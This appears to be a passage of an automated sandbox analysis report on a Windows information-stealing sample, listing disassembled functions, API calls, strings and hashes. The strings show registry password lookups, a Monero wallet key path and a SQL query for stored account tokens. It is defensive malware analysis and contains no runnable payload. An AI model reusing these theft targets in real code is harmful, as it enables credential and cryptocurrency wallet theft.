                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 24b4db6b79ab83adad7eee0fda3ec4c908f3390ed55d83c69e2a55ccb32361d4
                                • Instruction ID: 7c668ea987928388b28471249a462defe67fd4d968a9e9aa72898584b5eb3305
                                • Opcode Fuzzy Hash: 24b4db6b79ab83adad7eee0fda3ec4c908f3390ed55d83c69e2a55ccb32361d4
                                • Instruction Fuzzy Hash: 4D515EB1A40219ABDB20DF50DC45FEE77B8FF44701F108099A649A7180DB75AA85CFA9
                                Function 00DC72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DC733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DC73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DC740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00DC7452
                                • HeapFree.KERNEL32(00000000), ref: 00DC7459
                                • task.LIBCPMTD ref: 00DC7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: f34e7a3f82782752cd8c06e3638aa6d29cc5bada7b453f83b6ffb7a47dfa7076
                                • Instruction ID: 0cfff2bcc9944d7acf878e9d4e8b9d6eb10fb2d3159aabd8f79039c2c25d4e23
                                • Opcode Fuzzy Hash: f34e7a3f82782752cd8c06e3638aa6d29cc5bada7b453f83b6ffb7a47dfa7076
                                • Instruction Fuzzy Hash: 0E61F7B59142699BDB24DB50CC55FDAB7B8FB44300F0481E9E689A7141DBB06BC9CFB0
                                Function 00DCBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                • lstrlen.KERNEL32(00000000), ref: 00DCBC9F
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00DCBCCD
                                • lstrlen.KERNEL32(00000000), ref: 00DCBDA5
                                • lstrlen.KERNEL32(00000000), ref: 00DCBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 90b8ac32c6c8d2eb2bdf3b0765225c9f80fb52ba3a50f73b87a4c4180eaf83c4
                                • Instruction ID: 17981b849b34dc3e130653e522561d2820a345285d5d185c3b93983802d3b601
                                • Opcode Fuzzy Hash: 90b8ac32c6c8d2eb2bdf3b0765225c9f80fb52ba3a50f73b87a4c4180eaf83c4
                                • Instruction Fuzzy Hash: 46B14F71910118ABDB14FBA4DC96EEE733CEF54300F40816AF506A3291EF346A49CBB2
                                Function 00DD6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 02c9cc84cf82c91811c7f1c755fa3696a73e055479e73a559ec10b88722650a3
                                • Instruction ID: f00ff4b11cd606e3e39e28825da75a8c9fca02e574a4844f72c6a8e05d22c584
                                • Opcode Fuzzy Hash: 02c9cc84cf82c91811c7f1c755fa3696a73e055479e73a559ec10b88722650a3
                                • Instruction Fuzzy Hash: 83F05E30A04309EFD3559FE0E90976C7B70FB04703F0441A9E64A87785D67A8B419BE5
                                Function 00DC4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DC4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC4FD1
                                • InternetOpenA.WININET(00DE0DDF,00000000,00000000,00000000,00000000), ref: 00DC4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DC5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00DC5041
                                • InternetCloseHandle.WININET(?), ref: 00DC50B9
                                • InternetCloseHandle.WININET(?), ref: 00DC50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 081fd8ca4466017a0bf9eb8c5ced97925d632b776c5dc121b8b6f29a33cb3446
                                • Instruction ID: 5c9e13f5e0e85b5bed0747d7f40356615998c7b5f90aba06f3a32ec76f23bd51
                                • Opcode Fuzzy Hash: 081fd8ca4466017a0bf9eb8c5ced97925d632b776c5dc121b8b6f29a33cb3446
                                • Instruction Fuzzy Hash: 7A3105B4A00218EBDB20CF54DC85BDCB7B4FB48704F1081D9EA09A7285DB756AC58FA8
                                Function 00DD8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0162E128,00000000,?,00DE0E2C,00000000,?,00000000), ref: 00DD8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00DD8158
                                • wsprintfA.USER32 ref: 00DD81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: d11ff88de45ca0dbd309fbb17056627095e2dfbf00f46cf14bda49e120192a75
                                • Instruction ID: 3b1996aadbb65da924eba46f15a5cf8ea348ac3b6d5f3ae556f19dc10fc15e34
                                • Opcode Fuzzy Hash: d11ff88de45ca0dbd309fbb17056627095e2dfbf00f46cf14bda49e120192a75
                                • Instruction Fuzzy Hash: 102129B1E44318ABDB10DFD4CC49FAEB7B8FB44B10F104209F605AB284C77969058BB4
                                Function 00DD83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DD8426
                                • wsprintfA.USER32 ref: 00DD8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DD847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD8499
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0162DF18,00000000,000F003F,?,00000400), ref: 00DD84EC
                                • lstrlen.KERNEL32(?), ref: 00DD8501
                                • RegQueryValueExA.ADVAPI32(00000000,0162DEA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00DE0B34), ref: 00DD8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: c8a9c48200f1fa3ca50462ad6c19b9dd5e4e2e1234e0881534418e5e53394abe
                                • Instruction ID: 1c4f7c620e7f524bde3c719b0e0515c8100a0f173f47d528d4b3a6261ec3d068
                                • Opcode Fuzzy Hash: c8a9c48200f1fa3ca50462ad6c19b9dd5e4e2e1234e0881534418e5e53394abe
                                • Instruction Fuzzy Hash: AA210771A10228ABDB24DB54DC85FE9B3B8FB48700F00C1D9E649A7240DF75AA85CFE4
                                Function 00DD7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0161C320,00000000,00020119,00000000), ref: 00DD76DD
                                • RegQueryValueExA.ADVAPI32(00000000,0162DFF0,00000000,00000000,?,000000FF), ref: 00DD76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 8a181af558d72b4418c14b92d342fa7c7a4da8c6b464885bf5777b6524ecb9a8
                                • Instruction ID: e5b7e8a4ebb894c10dbbe7f19389e82a0831791dc213f6b501fa4969c40dec64
                                • Opcode Fuzzy Hash: 8a181af558d72b4418c14b92d342fa7c7a4da8c6b464885bf5777b6524ecb9a8
                                • Instruction Fuzzy Hash: 760162B5B44304FBDB11DBE4DC49F6EB7B8EB48701F108495FA45D7285E6B99A00CB60
                                Function 00DD7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0161C320,00000000,00020119,00DD76B9), ref: 00DD775B
                                • RegQueryValueExA.ADVAPI32(00DD76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00DD777A
                                • RegCloseKey.ADVAPI32(00DD76B9), ref: 00DD7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: c6df081870a4c7dd907d73d3f37f3eb3601233d3c3a71167bc1df39347b8e530
                                • Instruction ID: 6737330035d9f1e9905c707b8bfb20696ad4b5a2228a4409ef69719b6d96e6b9
                                • Opcode Fuzzy Hash: c6df081870a4c7dd907d73d3f37f3eb3601233d3c3a71167bc1df39347b8e530
                                • Instruction Fuzzy Hash: FA014FB5A40308FBDB11DBE4DC4AFAEB7B8EB48701F004559FA45A7285DAB55A008B61
                                Function 00DC99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                • LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 8121a75f167bbbfa459e6f73f1a01fbd4890bcef21146bd2555fa34905f7a981
                                • Instruction ID: 5a6fc5d962fbb67af0ea112a75bc171ef42a490bf206fe37968031c3f36ae30b
